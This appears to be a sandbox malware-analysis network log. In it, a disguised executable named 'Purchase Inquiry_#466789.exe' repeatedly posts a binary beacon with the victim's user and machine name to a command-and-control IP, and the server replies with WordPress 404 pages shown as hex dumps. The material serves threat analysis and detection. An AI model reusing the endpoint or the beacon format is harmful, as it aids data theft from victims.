                  May 27, 2024 08:32:09.994993925 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                  Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                  May 27, 2024 08:32:09.995004892 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                  Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                  May 27, 2024 08:32:09.995135069 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:32:09.995166063 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                  May 27, 2024 08:32:09.995176077 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                  Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                  May 27, 2024 08:32:09.995338917 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                  May 27, 2024 08:32:09.995378017 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                  Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.44974145.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:32:10.321376085 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:32:10.326277971 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:32:12.444559097 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:32:10 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:32:12.444612026 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                  May 27, 2024 08:32:12.444663048 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                  Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                  May 27, 2024 08:32:12.444695950 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                  Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                  May 27, 2024 08:32:12.444730043 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                  Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                  May 27, 2024 08:32:12.444762945 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:32:12.444794893 CEST224INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
                  May 27, 2024 08:32:12.444823980 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                  Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
                  May 27, 2024 08:32:12.444854021 CEST224INData Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63
                  Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
                  May 27, 2024 08:32:12.444886923 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.44974245.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:32:14.993057966 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:32:14.999521017 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:32:17.230618954 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:32:15 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:32:17.230633020 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                  May 27, 2024 08:32:17.230647087 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                  Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                  May 27, 2024 08:32:17.230663061 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                  Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                  May 27, 2024 08:32:17.230678082 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                  Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                  May 27, 2024 08:32:17.230691910 CEST672INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                  Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                  May 27, 2024 08:32:17.230705976 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:32:17.230731964 CEST224INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
                  May 27, 2024 08:32:17.230743885 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                  Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
                  May 27, 2024 08:32:17.230765104 CEST224INData Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63
                  Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  6192.168.2.44974545.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:32:17.391921043 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:32:17.397069931 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:32:19.619703054 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:32:17 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:32:19.619755030 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
